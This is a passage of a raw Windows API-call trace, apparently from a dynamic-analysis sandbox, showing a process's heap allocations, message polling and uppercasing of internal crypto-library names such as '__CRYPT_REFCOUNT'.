0x2e541c0 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.353] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0210.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.353] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0210.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.354] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0210.354] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0210.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0210.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0210.355] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0210.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.355] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0210.356] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.356] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0210.356] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.357] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0210.357] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0210.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0210.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0210.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.418] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0210.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0210.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0210.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0210.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.419] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0210.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0210.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0210.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0210.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0210.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0210.420] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.420] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.421] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0210.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0210.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0210.422] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.422] HeapFree (in: hHeap=0x970000, 